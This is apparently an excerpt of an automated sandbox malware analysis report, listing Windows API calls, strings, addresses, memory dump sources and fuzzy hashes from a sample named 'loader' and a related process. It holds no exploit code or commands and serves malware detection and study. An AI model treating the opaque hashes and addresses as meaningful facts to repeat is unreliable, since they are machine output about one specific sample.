              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
              • String ID:
              APIs
              • GetDC.USER32(00000000), ref: 00119DBE
              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00119DCD
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00119DDB
              • ReleaseDC.USER32(00000000,00000000), ref: 00119DE9
              Similarity
              • API ID: CapsDevice$Release
              • String ID:
              APIs
              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00122016
              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0012201B
              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00122020
                • Part of subcall function 0012310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0012311F
              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00122035
              Similarity
              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
              • String ID:
              APIs
                • Part of subcall function 00119DF1: GetDC.USER32(00000000), ref: 00119DF5
                • Part of subcall function 00119DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00119E00
                • Part of subcall function 00119DF1: ReleaseDC.USER32(00000000,00000000), ref: 00119E0B
              • GetObjectW.GDI32(?,00000018,?), ref: 00119F8D
                • Part of subcall function 0011A1E5: GetDC.USER32(00000000), ref: 0011A1EE
                • Part of subcall function 0011A1E5: GetObjectW.GDI32(?,00000018,?), ref: 0011A21D
                • Part of subcall function 0011A1E5: ReleaseDC.USER32(00000000,?), ref: 0011A2B5
              Strings
              Similarity
              • API ID: ObjectRelease$CapsDevice
              • String ID: (
              APIs
              Strings
              Similarity
              • API ID: _swprintf
              • String ID: %ls$%s: %s
              • API String ID: 589789837-2259941744
              • Opcode ID: 3a718e3b5e938abb0d48c4eaae82f93edd4a9491bb297c816281fefa70b7ed65
              • Instruction ID: 8100a5ae099a1c42352a063854e2668db32ad41d72d2a070b4c01ab1f5ee007c
              • Opcode Fuzzy Hash: 3a718e3b5e938abb0d48c4eaae82f93edd4a9491bb297c816281fefa70b7ed65
              • Instruction Fuzzy Hash: D351C531A8D701FAEA2E1AE4DD03FF67656EB1CB00F224936B3CA648D5D7D254D06603
              APIs
              • __EH_prolog.LIBCMT ref: 00107730
              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001078CC
                • Part of subcall function 0010A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0010A27A,?,?,?,0010A113,?,00000001,00000000,?,?), ref: 0010A458
                • Part of subcall function 0010A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0010A27A,?,?,?,0010A113,?,00000001,00000000,?,?), ref: 0010A489
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: File$Attributes$H_prologTime
              • String ID: :
              • API String ID: 1861295151-336475711
              • Opcode ID: 42506236270ba8fb6a117546e7e5bbf16db91fcc2942dbaa0ac528b01121d6a2
              • Instruction ID: 3b4c6b55d93bac009a178ede3a58ee748ea7ab11a70840312a43e1ed24697519
              • Opcode Fuzzy Hash: 42506236270ba8fb6a117546e7e5bbf16db91fcc2942dbaa0ac528b01121d6a2
              • Instruction Fuzzy Hash: EE418771C04258AADB25EB50DD59EEEB37CAF55340F0080DAB689A30D2DBB46F85CF61
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID: UNC$\\?\
              • API String ID: 0-253988292
              • Opcode ID: 2199f5041cc353742d81cf3b49a49dea41d17db3b67db25d405ef1bbde9641a3
              • Instruction ID: 4f9a4841ff8fd465fc596c4ccf550a83aa3e7cb91fb8bf4dcdd21c638de04ea5
              • Opcode Fuzzy Hash: 2199f5041cc353742d81cf3b49a49dea41d17db3b67db25d405ef1bbde9641a3
              • Instruction Fuzzy Hash: 3341C43544421ABACF20AF21DCC2EEF77ADAF54750F114466F8A4A31D2E7F0DA51CA64
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID: Shell.Explorer$about:blank
              • API String ID: 0-874089819
              • Opcode ID: 3a3554589a19aed192ce910f3bda00688e02082cdae81929fda133b21d27811f
              • Instruction ID: 7d637cee01922ca1258096e83aeee4a4d17060cb87bf3171e4da7f001293a8c8
              • Opcode Fuzzy Hash: 3a3554589a19aed192ce910f3bda00688e02082cdae81929fda133b21d27811f
              • Instruction Fuzzy Hash: 462182716043049FDB0C9F64D8A5AAA77A9FF48711B14C57DF8298F282DB70EC81CB60
              APIs
              • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,0012F5DF,?,00000000,?,00000000,00000000), ref: 0012F24C
              • GetLastError.KERNEL32(?,0012F5DF,?,00000000,?,00000000,00000000,?,00000000), ref: 0012F275
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ErrorFileLastWrite
              • String ID: ^PpL
              • API String ID: 442123175-914357616
              • Opcode ID: abe65c2a51cdfeb7fbe6afaf7c9276269b4fbfa4824c89f8a4fdd4e088e44a7e
              • Instruction ID: 6b8e82b9385f86c89aa63fd486e4a87b791235c05a9077a699646ef1e505bf1f
              • Opcode Fuzzy Hash: abe65c2a51cdfeb7fbe6afaf7c9276269b4fbfa4824c89f8a4fdd4e088e44a7e
              • Instruction Fuzzy Hash: B1314C75A00219DBCB28CF59DC819DAF3F9FF58310F2445BEE51AD7260E730AA918B54
              APIs
              • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,0012F5FF,?,00000000,?,00000000,00000000), ref: 0012F15E
              • GetLastError.KERNEL32(?,0012F5FF,?,00000000,?,00000000,00000000,?,00000000), ref: 0012F187
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ErrorFileLastWrite
              • String ID: ^PpL
              • API String ID: 442123175-914357616
              • Opcode ID: ff7474fd012f5836cbf6a2c36180838d0c5a8a6d6ad6b9df137c62a8bceabcc5
              • Instruction ID: cd55a1be6e646423356062b80180d68712e19c9a1b50748cc6469be016f38011
              • Opcode Fuzzy Hash: ff7474fd012f5836cbf6a2c36180838d0c5a8a6d6ad6b9df137c62a8bceabcc5
              • Instruction Fuzzy Hash: 5D216D75A00229DBCB28CF59DD90AE9B3F9EB48311F5044BDE946D7251D730AA92CB60
              APIs
                • Part of subcall function 0010EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0010EB92
                • Part of subcall function 0010EB73: GetProcAddress.KERNEL32(001481C0,CryptUnprotectMemory), ref: 0010EBA2
              • GetCurrentProcessId.KERNEL32(?,?,?,0010EBEC), ref: 0010EC84
              Strings
              • CryptProtectMemory failed, xrefs: 0010EC3B
              • CryptUnprotectMemory failed, xrefs: 0010EC7C
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AddressProc$CurrentProcess
              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
              • API String ID: 2190909847-396321323
              • Opcode ID: 42bb3a6606c083023131ce36b25199865863b200171b1e519a49caf1c6fba970
              • Instruction ID: 580e28a884b987a14075216a97ed85cb88972f77d27b96b88e1975c66ce34809
              • Opcode Fuzzy Hash: 42bb3a6606c083023131ce36b25199865863b200171b1e519a49caf1c6fba970
              • Instruction Fuzzy Hash: 18115E31A042246FFB199F36DF06A6E3794EF05B24B04441AFC856B2D1CBF69E8197D4
              APIs
              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0011F25E
              • ___raise_securityfailure.LIBCMT ref: 0011F345
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: FeaturePresentProcessor___raise_securityfailure
              • String ID: ^PpL
              • API String ID: 3761405300-914357616
              • Opcode ID: 291ec3c131e3d2946a53b66fe1d6dbf88dabf0885093a286b62cff76b3677337
              • Instruction ID: 980ca535e2d1e36c2466a4d405098ac151844012ca5f2bf465743188d63ed747
              • Opcode Fuzzy Hash: 291ec3c131e3d2946a53b66fe1d6dbf88dabf0885093a286b62cff76b3677337
              • Instruction Fuzzy Hash: C92125B55113249BD716DF54FD826823BE4BB5C310F10592AE9088BBA0E3F269C1CF45
              APIs
              • CreateThread.KERNEL32(00000000,00010000,001109D0,?,00000000,00000000), ref: 001108AD
              • SetThreadPriority.KERNEL32(?,00000000), ref: 001108F4
                • Part of subcall function 00106E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00106EAF
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Thread$CreatePriority__vswprintf_c_l
              • String ID: CreateThread failed
              • API String ID: 2655393344-3849766595
              • Opcode ID: f094753e005c6d72345adaad3e10799034b5157e3dcaec8c58b94ae7af1512cb
              • Instruction ID: 5eca70b1d18394008050df58adcedbd9a49558b24baf5fc17c4aacc5097acc61
              • Opcode Fuzzy Hash: f094753e005c6d72345adaad3e10799034b5157e3dcaec8c58b94ae7af1512cb
              • Instruction Fuzzy Hash: 7F0149B17443066FD629AF10EC81FA67398EB48711F20003DFA8A660C1CFF1B8C19664
              APIs
                • Part of subcall function 0010DA98: _swprintf.LIBCMT ref: 0010DABE
                • Part of subcall function 0010DA98: _strlen.LIBCMT ref: 0010DADF
                • Part of subcall function 0010DA98: SetDlgItemTextW.USER32(?,0013E154,?), ref: 0010DB3F
                • Part of subcall function 0010DA98: GetWindowRect.USER32(?,?), ref: 0010DB79
                • Part of subcall function 0010DA98: GetClientRect.USER32(?,?), ref: 0010DB85
              • GetDlgItem.USER32(00000000,00003021), ref: 0010134F
              • SetWindowTextW.USER32(00000000,001335B4), ref: 00101365
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ItemRectTextWindow$Client_strlen_swprintf
              • String ID: 0
              • API String ID: 2622349952-4108050209
              • Opcode ID: b712eb27ea4c42bc039dea2aa0bd64c74ef91adc7c1cfb0561064063295e8e35
              • Instruction ID: 07afeb84c811681bb6a9aa53204a1b97e7abde2b620c37a96b570a940110e00f
              • Opcode Fuzzy Hash: b712eb27ea4c42bc039dea2aa0bd64c74ef91adc7c1cfb0561064063295e8e35
              • Instruction Fuzzy Hash: F5F08C7010424CB6DF360F618C09BAD3B98BB25365F088414FD896A9E1C7F8C995EA50
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Free
              • String ID: FlsFree$^PpL
              • API String ID: 3978063606-34296952
              • Opcode ID: caf652bdff07f444682c9c6a67cfa83160886aa03f0e63db33468dc958d87d3a
              • Instruction ID: 70a1c47ed53a570a26690cbc7da5b0d495456ba4724be2e808c5790191bb11a7
              • Opcode Fuzzy Hash: caf652bdff07f444682c9c6a67cfa83160886aa03f0e63db33468dc958d87d3a
              • Instruction Fuzzy Hash: BCE0E5F1B45228ABD724AB65AC06DBE7BA0EF24B20F850059FC0557280DF615E50A6DA
              APIs
              • WaitForSingleObject.KERNEL32(?,000000FF,00110A78,?), ref: 00110854
              • GetLastError.KERNEL32(?), ref: 00110860
                • Part of subcall function 00106E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00106EAF
              Strings
              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00110869
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
              • String ID: WaitForMultipleObjects error %d, GetLastError %d
              • API String ID: 1091760877-2248577382
              • Opcode ID: 952bb3fc52759c6b12affd798bb386d19dc73cb868fa0d82848d3e0afb235926
              • Instruction ID: 4afdf2c94312899b30c6f0a90278fb12cefd1834452e5221c8c5c1b057d8489c
              • Opcode Fuzzy Hash: 952bb3fc52759c6b12affd798bb386d19dc73cb868fa0d82848d3e0afb235926
              • Instruction Fuzzy Hash: 3CD05E3190852167CA152724EC0ADAFB9059F66730F200725F67D651F5DB610AE182E9
              APIs
              • GetModuleHandleW.KERNEL32(00000000,?,0010D32F,?), ref: 0010DA53
              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0010D32F,?), ref: 0010DA61
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: FindHandleModuleResource
              • String ID: RTL
              • API String ID: 3537982541-834975271
              • Opcode ID: 9b8ae0b3af354f5c33883bf068c62edce56e452987882a2d066939ec62871530
              • Instruction ID: 36f9a99f3481aa5b594a2d8b9341bcd4364dd2971c55c6dafb7b8e22bc1f378c
              • Opcode Fuzzy Hash: 9b8ae0b3af354f5c33883bf068c62edce56e452987882a2d066939ec62871530
              • Instruction Fuzzy Hash: ACC01232389350BAEB3427607D0DB832E486B10B22F09048CB291DE5D0DAE9CA8087A4
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID: [wO
              • API String ID: 0-3450565399
              • Opcode ID: 45fc0ebfb73164635493a6e53dd2bb77836bc4bd7d5ab8925a2ca59f11861f0f
              • Instruction ID: 7ed8727e28cad6d165aa17c04d1867aa6140eaa89d40438394d1917e761d6a11
              • Opcode Fuzzy Hash: 45fc0ebfb73164635493a6e53dd2bb77836bc4bd7d5ab8925a2ca59f11861f0f
              • Instruction Fuzzy Hash: 5CA16A27B1C52B5AE7257BADB4659FD37A0EF80331B060477D59ECD0D3CD2A3A898290
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID: [wO
              • API String ID: 0-3450565399
              • Opcode ID: f175b9027ba340caa6ebf4edbc62c882661384076bca44c01a534fec062e628f
              • Instruction ID: ecc9edb66e7065bb077432c7efd8a8028865a69fbbcf9361323a91569a3753e7
              • Opcode Fuzzy Hash: f175b9027ba340caa6ebf4edbc62c882661384076bca44c01a534fec062e628f
              • Instruction Fuzzy Hash: 35A18C27B1C52B4AE71677ACB4615FD7BA0DF81331B0604B7D5DECE0D3CD2A298982A0
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9eb1010cac440cc28239451cb9242133e54640d5ee6d0332a0beed74d60bb358
              • Instruction ID: 72660add35e649e504a7764f5fbb0fc88789d0d372887de697e9fd2a99fdc5f0
              • Opcode Fuzzy Hash: 9eb1010cac440cc28239451cb9242133e54640d5ee6d0332a0beed74d60bb358
              • Instruction Fuzzy Hash: CE310C71E2991DAEDBA4EB98D8A56FCB7B1FF58300F51103AD04DE3292DE246A418B40
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fc6d638366d67c77977ff11dbebb6078fa68ae3468b7fbeaeacb9717208f5219
              • Instruction ID: 135e0bca0e212e82b5c9c7b621ec5a904147d5ccee6b21f51cef5d7697f3838c
              • Opcode Fuzzy Hash: fc6d638366d67c77977ff11dbebb6078fa68ae3468b7fbeaeacb9717208f5219
              • Instruction Fuzzy Hash: 5C316F70E1961E9EEB61DBA4C8A47ED77F1FF58300F0541B6C04AA32A1DB386B84CB50
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ac9df3abfc3fe8282118fe435e6cc26cd3b4508147e3054198a419c69d9492ac
              • Instruction ID: 1a4ffe10f544b7c80aa39648a05aa36cb2078b859b9e6db5aebc628637af8a37
              • Opcode Fuzzy Hash: ac9df3abfc3fe8282118fe435e6cc26cd3b4508147e3054198a419c69d9492ac
              • Instruction Fuzzy Hash: 5A31EA70E2A51E9AEBA5EB54C8A56E8B7B1EF58300F0101F9D51DD32A1DE346B858F40
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a14cdfb551836c787c536daffc62c17b9780b5f3300177475bd178987a7fed4d
              • Instruction ID: 7ecc515d02809e21925373cdfe06864364ef4aacb25d935d311f36a67d68cb89
              • Opcode Fuzzy Hash: a14cdfb551836c787c536daffc62c17b9780b5f3300177475bd178987a7fed4d
              • Instruction Fuzzy Hash: 2F214F71E1951E9BDF68DB54C4947EDB3A1FB68300F1042BAD01ED2295DE34AE85CB40
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1e5b903f351f6e49cce2ccfdb5205adc10b35daef4346758eab859c09b8225ab
              • Instruction ID: 3e89d71bd04070066f60f3eca929156a6fd69f2baf23ba29e93498df4b96ebda
              • Opcode Fuzzy Hash: 1e5b903f351f6e49cce2ccfdb5205adc10b35daef4346758eab859c09b8225ab
              • Instruction Fuzzy Hash: 4C21B07199E2CA1FD7169B705C265F63FB0AF03214F1A01EBE498CA4A3DA2C5656C352
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ed42d6e37db0c16f7269d871fcfbf30d6ec4f36642357a50d41bb4848dd0d9f8
              • Instruction ID: 6bd0789db124bb9c5583019bdd49b1c42d4623e00b470634902e708ff0dd3ca9
              • Opcode Fuzzy Hash: ed42d6e37db0c16f7269d871fcfbf30d6ec4f36642357a50d41bb4848dd0d9f8
              • Instruction Fuzzy Hash: 33213975E1851D9FEB64EF98C4A4AECB7F1FF98301F51407AC00AE72A1CA356A40CB00
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e4f63614e251fb4146282b2397239c2364984114914b3696acd4255dc7d3f099
              • Instruction ID: 174bb022f5ae3b76e00444ddd7341153bc8f4b4418b5dccbb01ddacec232d3bc
              • Opcode Fuzzy Hash: e4f63614e251fb4146282b2397239c2364984114914b3696acd4255dc7d3f099
              • Instruction Fuzzy Hash: 6921933095E68D9FD753ABB4C8689A57FF0EF57300B0544EAD445C7062DA289646C711
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ffb514e2f565beda655c1b89f42fdd44fe015dd216fb5846ba4e70fd24a29a4b
              • Instruction ID: 4db95c2f01c1cba7808c0a0da3b63ce5aafa16ba2aec98b15d1e97d377b96800
              • Opcode Fuzzy Hash: ffb514e2f565beda655c1b89f42fdd44fe015dd216fb5846ba4e70fd24a29a4b
              • Instruction Fuzzy Hash: 5C11E130B2E54E5FE755EBB884695B97BE0EF06300F0544F6E41DC70A7DE28A7858701
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b9497fb207e6c4b424173bc5c61779f0b57be560f90cae61e6283ba8fd5fcd4e
              • Instruction ID: 449108e773b1c32cb1057deb58e4d41bc5dddb622375a8b6f171709ebe94b954
              • Opcode Fuzzy Hash: b9497fb207e6c4b424173bc5c61779f0b57be560f90cae61e6283ba8fd5fcd4e
              • Instruction Fuzzy Hash: 8921FF30E2591D5EEBA4EB54C8657E9B7B1EF48300F0145F5954DE32A6CE346F818F40
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0ad7cf712dd3653b787aaf1dad1db46a1625c0bafd20c2b4a8e8b3929c7495da
              • Instruction ID: 589435714b32988fe55909f9a1a1a3b77bcdf280fcf186a77dabe4ef9b0f772b
              • Opcode Fuzzy Hash: 0ad7cf712dd3653b787aaf1dad1db46a1625c0bafd20c2b4a8e8b3929c7495da
              • Instruction Fuzzy Hash: A9117230A1E64E9FEB66EF64C8685BE77A0FF14304F0105BAD419C71A1EF35A600CB50
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 646cb4faf3dd9c170d593af651c59fcc2ddc1fc93684391beec00747a5c8d6f7
              • Instruction ID: 9075d765e0ef528ccc572c096f9f1117349aef0109d97d904affed5f2d14dd80
              • Opcode Fuzzy Hash: 646cb4faf3dd9c170d593af651c59fcc2ddc1fc93684391beec00747a5c8d6f7
              • Instruction Fuzzy Hash: B4117A31A1E14EAFEB50A7B8C86A1E837E0FF14304F0604B3C099C70A7ED30A640C281
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4a29b8f81b32298fdc318751e90d9b41974b73f155df5560c273ab436e6091d4
              • Instruction ID: b7242ea1639298aea885a4fc01b52b920ffcb1116df203f633e24df795f3158d
              • Opcode Fuzzy Hash: 4a29b8f81b32298fdc318751e90d9b41974b73f155df5560c273ab436e6091d4
              • Instruction Fuzzy Hash: CD11C430E1A50E5FE790EBA8C85E5BD77E1FF58700F4605B6D459C70A6EE34A6448740
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7cdf94d5d09754aa083857e60b3a85a4272f9fbd1bb263067a0c8335d3233a62
              • Instruction ID: 436c62ee327711cba86bf78078fbad8fb9e9d3bf3425a5836c669123ca30c22b
              • Opcode Fuzzy Hash: 7cdf94d5d09754aa083857e60b3a85a4272f9fbd1bb263067a0c8335d3233a62
              • Instruction Fuzzy Hash: EF11E670A1A65E5EEB65EBA4C4647B97BF0FF55304F0144BEE40AC60E2DE256640C700
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a82748fbed6281985856c0d130af7522c7d0191b3c585424a3f72fdca6c34be5
              • Instruction ID: d5d0efbcf94fe92a99ae7d976b0337c640ddbe7b20eef2bac837de26034978fc
              • Opcode Fuzzy Hash: a82748fbed6281985856c0d130af7522c7d0191b3c585424a3f72fdca6c34be5
              • Instruction Fuzzy Hash: 43118830A1961E9FDB58EF68C4596BE7BE0FF58308F10057AE81AD31A4CB74A6408A81
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d1bb46a068a5284d083a8eb1f40c614344d1742eb545037e08542cfee926f036
              • Instruction ID: 3edbae5ac22bdb8ed4fdaa71277dfc86d1c339cab169e70afbd9ac073ffb988b
              • Opcode Fuzzy Hash: d1bb46a068a5284d083a8eb1f40c614344d1742eb545037e08542cfee926f036
              • Instruction Fuzzy Hash: 9E115270A1A64E9FDB55EFA8C8696BE7BB0FF18300F4504BED41DC65A1DF35A6408700
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b9e0000_containercomponentSaves.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: af47ac31e90754cec95dee0796e60e874c33f0420c6d0b950800cc3d2698e899
              • Instruction ID: a6a1deb3775fb71398de9ea2c8e0b1bdeeb02e79c0eba674cbb7d6c255ed6cb7
              • Opcode Fuzzy Hash: af47ac31e90754cec95dee0796e60e874c33f0420c6d0b950800cc3d2698e899
              • Instruction Fuzzy Hash: 9F118E30A1964E9FDB54EBA8C4692BE7BF0FF18300F0204BED45AD22A5DB35A640C700
              Memory Dump Source
              • Source File: 00000004.00000002.1836379386.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
              Joe Sandbox IDA Plugin
